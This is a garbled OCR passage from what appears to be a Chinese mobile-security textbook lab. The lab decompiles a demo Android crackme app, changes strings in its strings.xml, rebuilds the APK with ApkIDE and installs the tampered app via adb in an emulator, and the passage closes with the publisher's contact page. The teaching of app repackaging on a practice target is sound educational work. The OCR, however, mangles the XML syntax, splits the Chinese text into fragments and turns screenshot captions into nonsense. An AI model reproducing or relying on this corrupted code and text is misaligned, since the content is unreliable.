参考 (R) ”帮助 (H) 
E wewemApk — || 5 C dA SS uro -/e* G3 
BÀ PR t. java|* Androi Mani fest. xml |* MainActivity. smali * strings. xml 


<?xml version-"1.0" encoding-"uc:í-8"?» 
«resources» 
«string name-"app name"»Crackme0201«/string» 
«string name="menu settings"5Settings«/string» 
«string name="title activity main"»Crackme0201«/string» 
«string name="info">Android 程 序 破解 演示 实例 </string> 
日 - 国 com. droider. orackme0201 «string name=nusernamen> 用 户 名 : «/string» 
| Andr oi Mani fest. xml «string name="sn">} ftg: </string> 
-E apktool. yml <string name="register"> 注 册 </string> 
由 -名 original «string name="hint username"> 请 输入 用 户 名 </string> 
eo res «string name="hint sn"> 请 输入 16 位 的 注册 码 </string> 
| EC) dawable-hdpi—~4 «string name="unregister"> 程 厚 未 注册 </string> 
由 -加 drawable-ldpi-v4 | «string name="registered"> 程 序 已 注册 </string> 
由 -加 drawable-ndpi-v4 «string name="unsuccessedn> 无 效用 户 名 或 注册 码 , 哼 哼哈 曙 ! c/string» 
«string name-"successed"»25 EM! 注册 成 功 </string> 
«/resources» 


BR... PO! IBTCEEHERONIESUSGASNSAR 


jar... 一 - 
D: VandriodVApkIDEW orkVcom. droi der. cr ackme0201 
E Vendri odXApkTDEVWorlsereXcom drai der ev ackmeti?01 


| as styles. xal 
| 由 -多 values-large—4 
e E smali 
H-E android 
BD- coa 
pr^ droider 
JH erackne0201 


Ad 


E VB hir e UIFP AUTRE NIME: IRE Bp REIHE RHET AD KIDE, or ackneC2. apk 


7-39 重新 生成 APK 
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JpUE 7. 重新 生成 APK 文件 后 ,在 Android 模拟 器 中 删除 之 前 安装 的 APK 文件 ， 
如 图 7-40 FER. 


i | 5554:test 


(3 Crackme0201 


Do you want to uninstall this 
app? 


图 7-40 删除 之 前 安装 的 APK 文件 


步骤 8: 然后 安装 重新 生成 的 APK 文件 (ApkIDE crackme02. apk) ,具体 命令 为 “adb 
install ApkIDE crackme02. apk”, 如 图 7-41 所 示 。 


» 5 9:20 Basic Controls 


m DPAD not enabled in AVD 
API Demos Browser Calculator Calendar e =) 


Hardware — hes es enabled in AVD 
Use on screen keyb 


= Ss E (2 


Camera Crackme010 Crackme020 
] 


— 


): Mela at VÀ RER icy SE eIARENEBRS-RSRE. Eom >adb install ApkIDE crackme02. apk 
crackmi72 KB) 's (1592 3l by tes in 0. 899s) 
pkg: . dat a/local/tmp/ApkIDE crackme02. apk 


e 


ouccess 


4 :\ 能 信安 \ 移 动 安全 实 训 平台 项 目 \ 实 操 5- 反 编译 、 算 改 漏洞 检测 和 重 现 


图 7-41 安装 重新 生成 的 APK 文件 
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步骤 9: 进入 该 APK ,然后 单 击 “* 注 册 ” 按 钮 ,出现 算 改 后 的 APK 信息 “无 效用 户 名 或 注 
册 码 , 哼 哼 哈 哩 ”, 如 图 7-42 所 示 。 


[4 
f^ i 


程序 未 注册 
Android 程 序 破解 演示 实例 
用 户 名 : | 请 输入 用 户 名 


注册 码 : ， 请 输入 16 位 的 注册 和 码 


无 效用 户 名 或 注册 码 , 哼 哼哈 嘿 ! 


图 7-42 显示 被 算 改 的 信息 


7.5.4 任务 与 思考 


Android SDK 中 包含 了 一 个 用 于 优化 APK 的 新 工具 zipalign, 它 提高 了 优化 后 的 APP 
与 Android 系统 的 交互 效率 ,从 而 可 以 使 整个 系统 的 运行 速度 有 了 较 大 的 提升 。Android 
小 组 建议 开发 者 在 发 布 新 APP 之 前 使 用 zipalign 优化 工具 ,而 且 对 于 已 经 发 布 但 不 受 限 于 
系统 版 本 的 APP, 建 议 用 优化 后 的 APK 替换 现 有 的 版 本 。 

读者 可 在 本 实验 的 基础 上 ,结合 zipalign 工具 的 文档 说 明 , 通 过 具体 实验 掌握 zipalign 
的 使 用 方法 。 
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感谢 您 一 直 以 来 对 清华 版 图 书 的 支持 和 爱护 。 为 了 配合 本 书 的 使 用 ,本 书 
提供 配套 的 资源 ,有 需求 的 读者 请 扫描 下 方 的 " 书 圈 " 微 信人 公众 号 二 维 码 ,在 图 
书 专区 下 载 ,也 可 以 拨打 电话 或 发 送 电 子 邮 件 咨询 。 

如 果 您 在 使 用 本 书 的 过 程 中 遇 到 了 什么 问题 ,或 者 有 相关 图 书 出 版 计划 ， 
也 请 您 发 邮件 告诉 我 们 ,以 便 我 们 更 好 地 为 您 服务 。 


我 们 的 联系 方式 : 
地 址 . 北京 海 深 区 双 清 路 学 研 大 厦 A Bs 707 


AB 编 . 100084 资源 下 载 、 样 书 申 请 


电 wm: 010 一 62770175 一 4604 
资源 下 载 : http://www. tup. com. cn 
电子 邮件 : weijj@ tup. tsinghua. edu. cn XH 
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